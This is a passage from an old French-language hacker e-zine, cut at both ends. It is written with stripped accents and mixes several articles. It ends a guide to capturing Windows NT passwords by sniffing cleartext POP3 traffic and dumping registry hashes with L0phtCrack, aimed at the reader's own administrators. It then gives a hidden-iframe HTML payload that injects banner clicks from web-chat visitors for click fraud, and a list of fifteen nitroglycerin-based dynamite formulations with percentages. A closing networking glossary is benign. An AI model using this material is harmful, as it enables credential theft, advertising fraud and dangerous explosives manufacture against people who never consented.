l'on devra cracker quand meme les pass. En effet, NT transmet les 
passwords sur le reseau (de la station vers le serveur) mais ce con les 
transmets cryptes... Ceci dit c'est deja pas mal et ca peut etre 
extremement pratique!!!
	La deuxieme solution est si vous avez un serveur de mail de 
sniffer les echanges avec ce serveur. Le service POP3 de NT n'est pas 
securise et les pass sont transmis sans etre codes ;) et la on se marre 
reellement mouahahahah. Installez le sniffer entre le serveur NT et le 
serveur de mails... Et voilou. Pour cela je ne saurais trop vous 
conseiller le programme sniffit qui tourne sous Unix et qui est a mon 
avis Le meilleur sniffer existant. Testez le et vous verrez.
	Bien sur si l'admin n'est pas trop CON, vous n'aurez jamais sont 
pass meme en crypte (faut pas rever quand meme). Ceci dit les admins sot 
parfois tres cons! Le mien dont je ne siterais pas le nom, utilise 
frequement un compte avec les droits administrateurs... Mouahahahah, 
c'est malin de sa part (et surtout tres gentil ;)

	Attention ne revez pas, ce n'est pas fini. Car si vous voulez 
reellement le password Administrateur (petit defi perso), il vous faudra 
utiliser par exemple (encore une fois) L0phtcrack. ET OUI!!! Pour ce 
faire vous devrais, avec des droits admin normalement, modifier dans la 
base de registre une variable pour pouvoir par la suite recuperer tous 
les passwords de votre reseau. La cle est 
HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName . Vous devrez 
mettre le login Administrator dans votre langue ( vue qu'on est 
francophones : Administrateur). Une fois que vous aurez fait cela vous 
pourrez dumper la base de registre. Pour cela une option est presente 
dans le menu tools :Dump password from registry.
Et la le miracle de Microsoft se revele a vous... La liste complete des 
passwords (a cracker bien sur mais ...). Au fait si votre version de NT 
est en Anglais pas besoin de sniffer!!! Heureusement que je vous le dit 
hein!!!

	Donc voila, je crois bien que j'ai fini. J'espere ne pas vous 
avoir trop fait chier en racontant toutes ces conneries et j'espere 
surtout que ca vous servira bien. Faites bien chier tous ces cons 
d'administrateurs NT... Je suis dispo a repondre a toutes vos questions. 
Sachez tout de meme que d'autres textes suivront sur NT si cela vous 
interresse.

	Le moment est venu de faire des greetings. Alors je commence (ca 
sera pas long) par Kthulu et BuBle qui m'ont aide et motive au debut, et 
surtout Utopiste qui m'a encore plus motive et qui a malheureusement 
disparue de la scene... Un grand salut donc a vous tous, ainsi qu'a 
Protek, Vatoo, et tous les anciens de Frhack dissemines un peu 
partout...


	FRANCOPHONES SOULEVEZ VOUS!!!!

Fedaikin	>>>>>>>>>>>>>	Fedaikin@altern.org
Collaborateur FrHack


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Slogan

/msg #hack.fr Bon tlm, dite quelques choses d'intelligent qui va paraitre dans le Emag.
<[ewoks]> l'homme qui a vu l'homme qui a vu l'ours qui mangeais l'homme
<ASHMEU> internet ca rentre tu su une diskette ?? ;) 
<PsYkAoS> Chien ... Assis! , Chien ... fait le beau! , Chien ... Donne la patte! , Chien ... soit pas 
gay!
<Undertake> yeahhh
<kthulu> n'est pas mort ce qui dans l'eau dort  jamais car au long des siecles peut mourrir 
mme la Mort.
<kthulu> il est une chose pire que de ne pas avoir russi, c'est de ne pas avoir essayer
<G0LdSteIn> LEUR SEUL CRIME C DES CURIEUX
<mbuf> Dans le but d'expliquer ce qui est, de toute facon, devenu chose commune chez les 
script kids.
<Mr0range> White man, Black man, Rip the system
<Mr0range> Bow DOwn Before Master-Blackdindon

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Iframe

Introduction

Vous avez srement entendu parler des banners qui paye pour les clicks reu
(pay per click). Ce service peut vous rapporter de l'argent...mme beaucoup!

Slick and outslag ou qqc de mme....haha...de la pure merde...vous allez
comprendre plus tard...


? 1

Bon. Premirement, vous devez vous trouver un sponsor. Je vous conseille
www.cyberthrill.com il vous donne .20$ US pour chaque click sur leur banner.
Un coup que vous vous tes inscrit, passez  l'tape 2.

? 2

Maintenant...une fois votre inscription au site termin vous avez srement
reu une adresse qui contient le CGI qui compte log et analyse la provenance
des clicks. Prenez en note cette adresse et passez  la prochaine tape.

? 3

Ensuite, vous devez trouver un bon HTML CHAT. Moi celui que j'utilise le plus
souvent c'est la Jazette (www.pignon.com). Allez dans le chat, et crivez ce
petit code HTML:

------Cut here------
<center>
<iframe name="content_name" width="3" height=""
src="l'addresse du CGI">
FrHack 0wnZ Ya!</iframe>
</center>
------Cut here------

L'adresse du CGI c'est l'adresse que vous avez prit en note  l'tape 2.
Understand?!?! Si tu comprend pas, c peut-tre que tu sais pas lire...tk...

Rsultats:
Euhh..c koi sa donne? Sa fait que tout le monde qui sont dans le chat click
sur ta banner, mais ils ne le savent pas. Si c'est pas assez puissant  ton
got, ben v lire le journal du Qubec, section offre de services.

Explication

C facile  comprendre...quelques html chat empche de faire des FRAME...
mais ils ont oubli IFRAME! ;)

Outro

Admettons qu'il y ait 100 personnes dans le chat (ce qui est frquent sur la
Jazette), et que votre banner vous rapporte .20$ par click, ben vous venez
de vous faire 20$ en mme pas une seconde! Le seul problme c'est que vous
ne pouvez pas le faire une autre fois, car les provider de banner compte pas
une 2ieme fois le mme IP...mais vous n'avez qu'a changer de html chat!

N'oubliez pas que ce code html peut aussi servir  d'autre CGI script tel que
les webcounters, votes, etc... A vous de dcouvrir ce que vous pouvez faire
d'autre avec ce dmon!

N.B.: Dpchez-vous de vous faire de l'argent parce que aprs la sortit de ce
texte les providers de banners vont srement essayer de patcher ce trou et
rendre ceci impossible...mais pour l'instant (et d'aprs moi pour encore
longtemps) sa marche trs bien!

The FrHack Crew
Cub1c

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Dynamite

Dans larticle qui v suive je vais vous donnez quelques "recettes" pour 
faire de la dynamite. Faut que vous soyez extrmement prcis dans les sub
stance a mlanger. L'article qui suit ne s'adresse pas a des dbutants, mais 
a des experts, parce que la manipulation de la nitro glycerine est trs 
dangereuse. Une base en chimie serais aussi prfrable. C'est pourquoi en
aucun cas je peu tre tenu responsable de ce que vous ferez avec l'article
qui suit, elle n'est qu'a but instructif.


La vous aller remarquer qu'il faut de la Nitro Glycerine dans tous les 
recettes, et vous vous demander comment faire ca??? Mais moi je vous dis
que ca va aller dans un prochain article plus ou moins loin. Tant mieux si
vous tes capable d'en avoir, ou  vous avez la recette pour en faire.

Je rappel, que la nitro glycerine doit tre tenu sous une chambre sans statique,
et a une temprature de 17 Celcius  22 Celcius, sinon ca va faire un 
beau ptit boom.

Ce qui est de comment mlanger ce qui suit, a moins que je me trompe, c'est
pas vraiment important, mais en cas d'erreur, je vous conseille de prendre
mon article comme une rfrence, et non un guide sur quoi vous baser (A part
le pourcentage d'ingrdient qui assurer d'tre vrai).

Pas mal tout les ingrdient (Sauf la Nitro Glycrine) ce trouve un peu 
partout, ou vous pouvez le faire. Bon voici les recettes:

#    ingredients 	            Pourcentage
-----------------------------------------
#1   Nitro Glycerine   		   		 32
     Nitrate de Sodium          		 28
     Brin de Scie (ripe de bois)           10
     Oxalate ammonium    	             29
     Poudre Noir                           1


#2   Nitro Glycerine                        24
     Nitrate de Potasium                   9        
     Nitrate de Sodium                     56
     Brin de Scie (ripe de bois)           9
     Oxalate ammonium                      2


#3   Nitro Glycerine                       35.5
     Nitrate de Potassium                  44.5
     Brin de Scie (ripe de bois)           6
     Pourdre Noir                          2.5
     Vaseline                              5.5
     Charbon de Bois (poudre)              6


#4   Nitro Glycerine                       50
     Nitrate de sodium                     32.6
     Brin de Scie (ripe de bois)           17
     Oxalate ammonium                      .4


#5   Nitro Glycerine                       57
     Nitrate de Potassium                  19
     Brin de Scie (ripe de bois)           9
     Oxalate ammonium                      12
     Pourdre Noir                          3


#6   Nitro Glycerine                       26
     Brin de Scie (ripe de bois)           40
     Nitrate de Barium                     32
     Carbonate de Sodium                   2


#7   Nitro Glycerine                      44
     Brin de Scie (ripe de bois)          12
     Sulfate de Sodium                    44


#8   Nitro Glycerine                      24
     Nitrate de Potassium                 32.5
     Brin de Scie (ripe de bois)          33.5
     Oxalate ammonium                     10


#9   Nitro Glycerine                      26
     Nitrate de Potassium                 33
     Brin de Scie (ripe de bois)          41
 
#10  Nitro Glycerine                      15
     Nitrate de sodium                    62.9
     Brin de Scie (ripe de bois)          21.2
     Carbonade de Sodium                  .9

#11  Nitro Glycerine                      35
     Nitrate de sodium                    27
     Brin de Scie (ripe de bois)          10
     Oxalate ammonium                     1


#12  Nitro Glycerine                      32
     Nitrate de Potassium                 27
     Brin de Scie (ripe de bois)          10
     Oxalate ammonium                     30
     Pourdre Noir                         1


#13  Nitro Glycerine                      33
     Brin de Scie (ripe de bois)          10.3
     ammonium oxalate                     29
     Pourdre Noir                         .7
     Perchloride de potassium             27


#14  Nitro Glycerine                     40
     Nitrate de sodium                   45
     Brin de Scie (ripe de bois)         15


#15  Nitro Glycerine                     30
     Nitrate de sodium                   22.3
     Brin de Scie (ripe de bois)         40.5
     Chlorate de Potassium               7.2


Voil cest la fin. Je sais pas si vous le saviez, mais la dynamite c'est trs 
puissant, donc faite attention.

The FrHack Crew
Anonyme

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Therme rgulier d'Internet

En restant assis devant mon cran, neunoeuilles rivs sur #hack.fr et en buvant un Sprite 
(chez certains c'est des Pepsi), j'tais parfois (souvent) perdu dans les termes employs : UDP 
= ? (ok je sais ce que cela signifie en gros mais les lettres U.D.P., c'est quoi exactement ? ), 
ICMP = ? (ben la mme chose que prcdemment) .. etc etc etc.
Je pense pas que ca soit non plus trs amusant pour une personne de niveau avanc, de 
rpondre  la question : "a signifie quoi DNS ? ". #Hack.fr est un peut-tre un canal d'aide, 
mais y' des limites aussi.

C'est pourquoi, j'ai dcid de faire un glossaire pour rpertorier le maximum de termes afin que 
les newbies newbies et les newbies avancs vitent de faire perdre du temps aux "experts" si je 
puis dire ainsi.

Questions, commentaires, BombMail, lettres piges, Tueurs  gages, escorts (a je vous 
donnerais ma vraie adresse par exemple), vous pouvez me rejoindre au e-mail : 
gabberman78@hotmail.com . merci et bonne lecture.


@ A @

* Accs commut (switched access)  :
- Connexion au rseau qui peut tre tablie ou rompue  la demande. Les connexions "Dial-UP" 
en reprsentent la forme la plus simple. SLIP et PPP sont gnralement lancs au travers d'un 
accs commut.

* Archie :
- Systme permettant de localiser des fichiers disponibles publiquement par FTP (cf FTP) 
anonyme.

*  ARPAnet :
- Rseau exprimental tabli dans les annes 1970. Il a permis de dvelopper et tester les 
thories et les logiciels sur lesquels Internet s'appuie aujourd'hui. Il a disparu aujourd'hui au profit 
d'autres rseaux comme NSFnet.

* ASCII (American Standard Code for Information Interchange) :
- Un standard cr pour assurer la compatibilit entre divers types d'quipements de traitement 
de donnes. Le jeu de caractres ASCII standard contient 128 nombres dcimaux (codage 7 
bits), de 0  127, correspondant aux lettres, nombres, marques de ponctuation et autres 
caractres spciaux communs. Le jeu de caractres ASCII tendu contient galement l28 
nombres, mais de 128  255, et il est utilis par les caractres nationaux (nos caractres 
accentus), des caractres graphiques, mathmatiques ou spciaux.


@ B @

* B-ISDN (Broadband Integrated Services Digital Network) :
- C'est le rseau large bande du futur qui permettra de transporter tous les services numriques.

* Backbone :
- Rseau central  haute vitesse qui contacte des rseaux plus petits et indpendants.

* Bande de base :
- Transmission d'un signal de donnes dans sa bande de frquence d'origine.

* Bande passante (Bandwidth en anglais) : 
- Quantit de donnes que peut vhiculer un canal de communication. Plus le dbit est 
important, plus les donnes peuvent
tre transmises rapidement. Exprim en bps.

* BBS (Bulletin Board System) : 
- C'est un ordinateur, souvent un micro, install pour recevoir des appels et offrir des services en 
ligne. Les BBS permettent  leurs usagers de s'changer des messages et fichiers ou encore de 
lire les Bulletins en ligne. Ils offrent souvent d'autres services : bases de donnes, News et 
confrences, shopping, etc.

* Binaire (fichier) (Binary file):
- Fichier numrique qui n'est pas compos uniquement de texte (programmes, images, sons, 
fichiers compresss, etc.)

* Bit :
- Plus petite unit d'information pouvant tre transmise. Une combinaison de bits peut indiquer 
un caractre alphabtique, un chiffre ou remplir d'autres fonctions parmi lesquelles la 
signalisation et la commutation.

* BOT (beginning-of-tape, marqueur de dbut de bande) :
- Le terme "bot" est couramment employ pour dsigner des programmes qui coutent et 
rpondent  une conversation sur un canal IRC.

* BPS (Bits par seconde) :
- Mesure de la vitesse de transmission d'un modem.


@ C @

* Canal : 
- Voie de tlcommunications (canal de transmission) d'une capacit spcifique (vitesse) entre 
deux emplacements sur un rseau.

* CCITT (The Consultative Committee for International Telephony and Telegraphy)
- Un comit consultatif international mis en place par les Nations unies. Ses membres 
comprennent les autorits des postes, tlgraphes et tlphones, des organismes scientifiques 
et les compagnies prives.

* Cellule :
- Petit paquet de 53 octets comprenant 48 octets de donnes et 5 octets de supervision.

* Cern :
- Acronyme de Centre Europen de Recherche Nuclaire. Le concept du WWW a t dvelopp 
par un de ses chercheurs. http://www.cern.ch/

* CGI :
- L'interface Common Gateway Interface (Interface Gateway commune) s'adresse aux 
programmeurs qui crent des applications ou des scripts excuts secrtement sur un serveur 
web. Ces scripts peuvent gnrer du texte ou d'autres types de donnes  la vole, peut-tre en 
rponse  une entre de l'utilisateur ou  l'extraction d'informations d'une base de donnes. 

* Client :
- Logiciel d'application qui travaille pour votre compte de manire  accder  un serveur offrant 
un service quelque part sur le rseau.

* Connexion :
- Voie de transmission point  point spcialise ou commute.

* Contrle de flux :
- Processus de contrle de la cadence des units d'information.

* Cyber-mdecin :
- Mdecin se lanant  l'assaut du cyber-espace. (scusez je la trouvais drle celle la... haehahe)

* Cyber-Sexe :
- Ben c'est comme Cyber-mdecin, sauf que la...ben.. si vous jouer  a..comment dire... ahh 
pis laisser faire ; )


@ D @

* Datagramme :
- Service offert par un rseau en mode sans connexion. Les paquets sont considrs comme 
indpendants les uns des autres et portent l'adresse complte du rcepteur.

* Datagramme IP (IP Datagram) :
- Il s'agit de l'unit informative de base transitant en rseau Internet. Elle contient en plus des 
donnes les adresses de sources et destination ncessaires  la transmission de mme que les 
bits de contrle.

* Dial-up : 
- Connexion au rseau Internet par modem (par opposition aux connexions permanentes sur les 
lignes spcialises).

* DNS (Domain Name System) ou (systme de noms de domaine)
- C'est une base de donnes distribue qui donne la correspondance des noms de machines 
(comme www.ecam.be) en adresses Internet (comme 194.78.22.130), et inversement. Le DNS 
vite notamment d'avoir  se souvenir de listes d'adresses Internet.

* Dorsale (Backbone) :
- Rseau de connexions  large bande entre commutateurs.


@ E @

* EIA (Electronics Industry Association) :
- Association amricaine qui a dfini les normes RS232C et RS422.

* ETCD :
- Equipement de Transmission de Circuit de Donnes.

* Ethernet :
- Rseau local utilisant la technique d'accs CSMA/CD (Carrier Sense Multiple Access/ Collision 
Detection).

* ETTD :
- Equipement Terminal de Traitement de Donns Dsigne tous les types de terminaux, y 
compris les ordinateurs.


@ F @

* FAQ (Frequently Asked Question(s) ) :
- En l'occurrence cela recouvre deux significations complmentaires : une question 
frquemment pose, ou une liste rcapitulative des questions et leurs rponses associes. De 
nombreux groupes de News de USENET, ainsi que quelques listes de discussion d'autres 
origines maintiennent et publient rgulirement ces listes de faon que les participants ne 
passent pas leur temps  rpondre  des questions dj traites. 

* Fast Ethernet :
- Rseau Ethernet utilisant la technique CSMA/CD de base  100 Mbit/s.

* FDDI (Fiber Distributed Data Interface) :
- Rseau local et mtropolitain qui peut atteindre 100 kilomtres et qui utilise un double anneau 
contra-rotatif avec une mthode d'accs de type jeton temporis.

* Finger :
- Protocole permettant de trouver des informations sur les utilisateurs de votre rseau hte. 
Certains rseaux ne permettent pas d'utiliser ce protocole  partir d'un systme externe et 
d'autres l'interdisent compltement.

* Firewall : 
- Un firewall est un logiciel de type garde barrire qui prmunit le serveur Internet contre 
d'ventuelles attaques de l'extrieur.

* Freeware :
- Logiciel gratuit, copiable  volont mais dont l'auteur se rserve la proprit, le programme 
source n'tant pas modifiable.

* FTP (File Transfer Protocol) ou (protocole de transfert de fichiers)
- Dfinit la manire de transfrer les fichiers d'un ordinateur  l'autre.

* Full duplex :
- Le terme full duplex signifie qu'une communication , s'effectue dans les deux sens 
(terminal/serveur et serveur/terminal) simultanment,  la mme vitesse.


@ G @

* Gopher : 
- Ce terme est associ  tous les sites Internet spcialiss dans la recherche de documents par 
menus. Les serveurs Gopher ont en quelque sorte t les prcurseurs des systmes plus 
volus que sont les serveurs Web. Depuis une page HTML, il est possible d'accder  un site 
Gopher en continuant la consultation avec un simple client Web.

* GUI (Graphical User Interface)
- Interface utilisateur graphique.


@ H @

* Half duplex :
- Le terme Half duplex signifie qu'une communication fonctionne dans les deux sens, mais dans 
une seule direction  la fois.

* Hte (Host) : 
- Il s'agit d'un ordinateur distant qui accueille l'appel d'une machine.

* HTML (HyperText Markup Language) :
- Langage de marquage des documents hypertextes . C'est le langage dans lequel sont dcrits 
les documents du World Wide Web.

* HTTP (HyperText Transfert Protocol) :
- Protocole rgissant le Web.

* Hypermdia :
- Combinaison des termes Hypertexte et Multimdia.

* Hypertexte :
- Concept de documents lectroniques qui permet de faire rsider au sein d'un seul et mme 
fichier tant les donnes utiles aux individus que les informations de services qui seront utilises 
par les logiciels de consultation. Les documents HTML sont des documents hypertextes.


@ I @

* IAB (Internet Architecture Board) :
- C'est le conseil qui labore les rflexions sur l'Internet et prend les dcisions sur les points 
importants comme sur les normes  appliquer.

* ICMP (Internet Control Message Protocol) :
- Il s'agit d'une extension du protocole d'Internet. Il permet la gnration de messages d'erreurs, 
de paquets test et de messages informatifs relatifs au IP.

* Intranet : 
- Les mmes concepts et les mmes types de service que l'Internet mais appliqus  un certain 
nombre d'utilisateurs. L'accs restreint  un Intranet est le plus souvent ralis par un identifiant, 
un mot de passe et parfois l'adresse IP des machines.

* IP (Internet Protocol) :
- Le protocole Internet de base dfinit le datagramme comme l'unit d'information transitant  
travers l'Internet et fournit les bases protocolaires d'une connexion Internet. IP inclut le protocole 
ICMP. L'intgralit des protocoles ncessaires  l'Internet sont souvent associ  TCP/IP car 
TCP et IP sont les deux protocoles complmentaires fondamentaux de l'Internet.

* ISDN (Integrated Services Digital Network - Rseau numrique  intgration de services) voir 
RNIS.

* ISO (International Organization for Standardization) :
- Organisme international de standardisation regroupant les organismes similaires de 89 nations. 
L'ISO est en charge des standards qui rgissent l'Internet actuellement.

* Isochrone :
- Mode de transmission de donnes dans lequel les instants d'mission et de rception de 
chaque bit, caractre ou bloc  information sont fixs  des instants prcis.

* ISP (Internet Service Provider) :
- Prestataire d'accs Internet.


@ J @

* Java : 
- Langage de programmation orient-objet dvelopp par Sun apportant de nouvelles 
fonctionnalits aux services de L'Internet.


@ K @ 

Aucune dfinition disponible

@ L @

* LAN (Local Area Network) :
- Rseau qui est gographiquement limit  quelques kilomtres et qui correspond  la taille 
d'une entreprise.

* Ligne ddie ou ligne spcialise :
- Ligne de communication prive tablie entre deux points. Ce type de ligne est gnralement 
utilis pour relier un rseau local d'importance moyenne  un fournisseur de services Internet.

* List-Serv :
- ListServ est un logiciel gratuit qui automatise la maintenance et la distribution de listes de 
diffusions de messages lectroniques. Il existe des listes de diffusion concernant de nombreux 
sujets - certaines listes sont "ouvertes" (tout abonn  la liste peut envoyer un message  toute 
la liste, comme lors d'une conversation), et d'autres sont "fermes" (seules certains abonns 
peuvent crer des messages, mais tous les abonns peuvent les lire).

* Login : 
- Votre identifiant sur Internet. Il est en principe assorti d'un mot de passe.


@ M @

* MAN (Metropolitan Area Network) :
- Rseau qui a la taille d'une mtropole et qui permet d'interconnecter des rseaux locaux 
jusqu' une centaine de kilomtres.

* MIME (Multi Purpose Internet Mail Extensions) : 
- Systme d'encodage le plus utilis pour joindre des fichiers numriques aux courriers 
lectroniques.

* Modle de rfrence :
- Modle permettant de dcrire un service de tlcommunication par un ensemble de sept 
couches fonctionnelles.

* Modem (MODulateur-DEModulateur) :
- Priphrique informatique connect  un ordinateur et  une ligne tlphonique qui permet de 
transmettre des donnes numriques (informatiques) sur une ligne analogique (tlphonique). 
Lorsqu'on met des donnes numriques sur la ligne, le modem MODule les donnes. Lorsqu'on 
reoit des donnes analogiques sur un ordinateur, le modem DEModule.

* Multiplexeur :
- quipement permettant de prendre en charge sur une voie haute vitesse, plusieurs voies basse 
vitesse simultanes.

* Multipoint :
- Connexion simultane vers plusieurs points.


@ N @

* NCSA :
- Le National Center for Supercomputing Applications - Centre national des applications pour 
supercalculateur est un institut de formation. C'est l que le premier explorateur web (Mosaic) a 
t dvelopp. http://www.ncsa.uiuc.edu/

* NETiquette :
- Ensemble de rgles de bonne conduite inhrentes  la communication sur Internet.

* NFS (Network File System) :
- Systme de fichiers orient rseau. C est un ensemble de protocoles permettant d'utiliser des 
fichiers sur d'autres ordinateurs d'un rseau, comme si ces fichiers taient locaux. Aussi, plutt 
que d'utiliser FTP (v.) pour transfrer un fichier sur votre ordinateur, peut on lire, crire ou diter 
un fichier distant. NFS a t dvelopp par Sun Microsystems Inc. mais est actuellement 
disponible sur un grand nombre de machines.

* Nom de domaine : 
- Utilis pour nommer un site Web. Exemple : le nom de domaine de Centre Hospitalier 
Universitaire de Rouen est chu-rouen suivi du suffixe fr pour France, qc pour Qubec, ca pour 
Canada...

* NSCA (National Center for Supercomputing Applications) :
- Groupement  l'origine d'un grand nombre de logiciels clients du domaine public utiliss sur 
l'Internet.

* NSFnet :
- C'est le rseau de la National Science Foundation aux Etats-Unis. NSFnet n'est pas l'Internet, 
c'est juste l'une de ses trs nombreuses composantes, mme s'il y joue un rle actif.

* NTP (Network Time Protocol) :
- C'est un protocole utilis pour synchroniser le temps entre diffrents ordinateurs de l'Internet.


@ O @

* OSI (Open System Interconnection) :
- Systme Ouvert d'Interconnexion, qui correspond  un ensemble de protocoles rseaux.


@ P @

* Passerelle :
- Convertisseur de protocole. Nud spcifique  l'application qui connecte des rseaux qui 
seraient autrement incompatibles.
Convertit des codes de donnes et des protocoles de transmission pour permettre 
l'interfonctionnement.

* Ping (Packet Internet Gropher) :
- Programme utilis en Internet pour tester l'accessibilit d'un destinataire en lui envoyant un 
message ICMP (cf ICMP) et en attendant la rponse avant de procder  l'envoi des donnes. 
Le terme est souvent utilis de manire gnrale pour reprsenter l'accessibilit d'un 
destinataire." please ping host A to see if it is alive".

* Plsiochrone :
- Deux signaux sont dits plsiochrones lorsque leurs instants significatifs se prsentent  la 
mme cadence nominale, toute variation de cette cadence tant maintenue dans des limites 
spcifies. (tin, dit a dans un chan, pis tu deviens OP.. haheahe c'est une joke la.. quoique ;)

* Pointeur :
- Adresse (URL) incorpore dans des donnes et indiquant l'emplacement de donnes dans un 
autre enregistrement ou fichier. Un hyperlien est un exemple de pointeur.

* Pont :
- Passerelle d'interconnexion entre deux rseaux locaux qui commute sur des adresses MAC.

* POP (point of presence - point de prsence) :
- Un "pop" est la connexion commute d'un prestataire de services Internet (ISP) pour les 
utilisateurs de modem. Il est particulirement utilis pour dcrire des connexions locales afin que 
les utilisateurs de modem n'aient pas  composer un numro longue distance. Ainsi, un ISP 
spcifique peut tre bas  San Jos mais avoir des "POP"  Los Angeles et New York.

* POP 3 : (Post Office Protocol version 3) : 
- Protocole utilis pour le courrier lectronique.

* PPP (Point to Point Protocol) :
C'est un protocole qui permet  un ordinateur d'utiliser les protocoles TCP IP, et de devenir ainsi 
un membre de l'Internet  part entire, en utilisant une simple ligne tlphonique associe  un 
modem rapide. PPP est un nouveau standard, qui remplace SLIP. Il est aujourd'hui support par 
tous les fournisseurs d'accs Internet.

* Protocole :
- Ensemble de rgles destines  raliser une communication.

* Proxy : 
- Programme qui tourne sur un pont ou une passerelle et qui bloque le passage direct des 
paquets entre le client et le serveur et n'autorise le passage que de certains paquets.

* PSTN :
- Acronyme de "Public Switched Telephon Network", c'est  dire le rseau tlphonique 
classique, encore appel rseau tlphonique commut (RTC).


@ Q @

Aucune dfinition disponible 

@ R @

* Rflecteur de messages (malt reflector) :
- Adresse lectronique particulire ; un courrier adress  cette adresse est automatiquement 
redirig vers une liste d'adresses. Fonction typiquement utilise dans le cas d'une discussion 
groupe o les changes sont effectus par la
messagerie.

* Relais de trame (Frame Relay) :
- Technologie de transfert de donnes utilise parfois pour des vitesses importantes (64Kb - 
1,5Mb) dans les connexions Internet. Son utilisation est surtout le fait des oprateurs plus que 
des utilisateurs individuels.

* Rpteur :
- Equipement plac sur une liaison, permettant d'amplifier ou de rgnrer les signaux transmis.

* Rseau :
- Ensemble d'ordinateurs connects par une liaison spcialise ou commute pour assurer une 
communication locale ou distante (de voix, vidos, donnes, etc.) et faciliter l'change 
d'informations entre des utilisateurs ayant des intrts communs.

* RNIS (Rseau Numrique  Intgration de Services) :
- Rseau dont le but est d'intgrer au dpart la voix tlphonique et les donnes (bande troite), 
et d'y ajouter des applications multimdias, voix, donnes, image (large bande). Il permet 
actuellement une connexion  l'Internet  64Kb.

* Routage :
- Dtermination du chemin emprunt dans un rseau par une communication ou un paquet de 
donnes.

* Route :
- En gnral la route est le chemin emprunt par le traffic rseau pour aller de sa source  la 
destination. En Internet, chaque datagramme. IP est rout sparment et peu donc emprunter 
des chemins physiques extrmement variables. Les datagrammes sont corrigs et rassembls 
 l'arrive pour dlivrer l'information.

* Routeur :
- Passerelle d'interconnexion entre deux rseaux qui commute sur une adresse de niveau 
rseau.


@ S @

* Serveur : 
- Ordinateur consultable par un autre ordinateur  l'aide d'un logiciel client.

* SGML :
- Le langage SGML (Standard Generalized Markup Language) permet de dcrire d'autres 
langages structurs de description de documents. Par exemple, le langage HTML est dfini  
l'aide du langage SGML.

* Shareware :
- Les sharewares sont des logiciels qui sont distribus en versions intgralement fonctionnelles 
sur les rseaux de communication numriques. On peut les utiliser gratuitement pendant une 
dizaine de jours mais, au-del de cette priode d'essai, il faut acquitter le montant de la licence 
d'exploitation pour se mettre en rgle.

* SLIP :
- Acronyme de "Serial Line IP", c'est  dire IP sur ligne srie. C'est un protocole qui permet  un 
ordinateur d'utiliser les protocoles Internet,  partir d'une ligne tlphonique et d'un modem. SLIP 
est dpass par PPP plus puissant et complet,                    mais est toujours utilis, surtout dans 
le monde des PC.

* SMTP : 
- Simple Mail Transfer Protocol, le protocole qui, en un rseau TCP/IP, dcrit le transit du 
courrier lectronique entre l'ordinateur hte et les utilisateurs. Port : 25.

* SSL :
- La Secure Socket Layer est un protocole garantissant la scurit des communications de 
donnes par cryptage et dcryptage des donnes changes. 
http://home.netscape.com/newsref/pr/newsrelease17.htm/


@ T @

* Taux d'erreur rsiduel :
- Rapport du nombre des bits, caractres ou blocs incorrectement reus mais non dtects ou 
non corrigs, sur le nombre total de bits, caractres ou blocs mis.

* TCP (Transmission Control Protocol) :
- Le protocole standart Internet de niveau transport qui fournit un service fiable, en full duplex de 
transmission de donnes. Beaucoup d'applications rseau sont bases sur ce protocole qui 
associ au protocole IP reprsente la partie fondamentale des protocoles Internet. TCP tablit 
des connexions orientes dans le sens o les participants  un change de donnes                     
doivent auparavant tablir une connexion. En gnral les logiciels utilisant TCP sont installs au 
niveau systme d'exploitation et utilise IP pour transmettre des donnes sur Internet.

* Token-Ring :
- Rseau local utilisant une technique d'accs de type jeton non adress sur une boucle.

* Trame :
- Bloc de donnes dans un protocole de liaison. Ensemble d'intervalles de temps conscutifs 
allous  des sous-voies dans un multiplexage temporel.

* Transmission asynchrone : 
- Communication srie entre deux ordinateurs dont les signaux sont mis  intervalles 
irrguliers. Les donnes sont transmises prcdes d'un bit de dbut (start bit) et d'un bit de fin 
(stop bit). Une communication asynchrone permet  un caractre d'tre envoy au hasard sans 
timing prcis. En cas de nuisance sur la ligne, le modem pourra ainsi dterminer des moments 
favorables.

* Transmission synchrone :
- Mode de transmission dans lequel l'metteur et 1e rcepteur sont synchroniss par un signal 
d'horloge. Les vnements sont programms selon des dures fixes et les accuss de rception 
ne sont pas ncessaires pour pouvoir les complter.

* Telnet :
- Telnet est un programme rseau qui permet d'ouvrir une session et de travailler sur un 
ordinateur  partir d'un autre ordinateur. En ouvrant une session sur un autre systme, les 
utilisateurs peuvent accder aux services Internet dont ils ne disposent pas sur leurs propres 
ordinateurs.

* Temps rel :
- Transmission et traitement rapides de donnes et oprations orientes vnement au moment 
o elles se produisent, par                       opposition  leur stockage, retransmission ou 
traitement en lots.

* Transporteur :
- Prestataire de services de tlcommunications possdant un quipement de commutation de 
rseau.


@ U @

* UDP (User Datagram Protocol) :
- Un protocole de paquet-niveau tabli directement sur la couche de Internet Protocol. UPD 
utilise des programmes d'application--application entre les systmes htes.

* URL (Uniform Ressource Locator) :
- Il s'agit d'un pointeur vers une source d'information sur le rseau. L'URL est apparu avec le 
Web qui se proposait d'unifier la plupart des services existant. Il fallait donc un systeme unique 
de pointeur pour rfrencer des services de nature et finalit diffrentes.

* Unix : 
- Systme d'exploitation utilis sur de trs nombreux serveurs. La rfrence encore aujourd'hui 
sur le Net pour les serveurs.

* Usenet (USEr NETwork - Rseau utilisateur) :
- Groupes de discussion thmatiques ("Newsgroups") sur Internet. Une des formes les plus 
rcentes de courrier lectronique de groupe. On dnombre actuellement environ 10 000 
newsgroups diffrents.


@ V @

* VRML - Virtual Reality Modeling Language - Langage VRML :
- Langage qui permet aux pages Web d'afficher des graphiques tridimensionnels et de proposer 
un mode de navigation spacial interactif.

* Veronica : 
- C'est un service, trs similaire  Archie , qui est construit autour de Gopher. Tout comme 
Archie permet de chercher des sites FTP possdant un fichier donn, Veronica permet de faire 
de mme en indiquant les sites Gopher offrant une entre
particulire recherche. (voir aussi Escort..ben quoi.. Veronica, belle brune, 5p10, 110 lbs... 
yummy ;)


@ W @

* Wais :
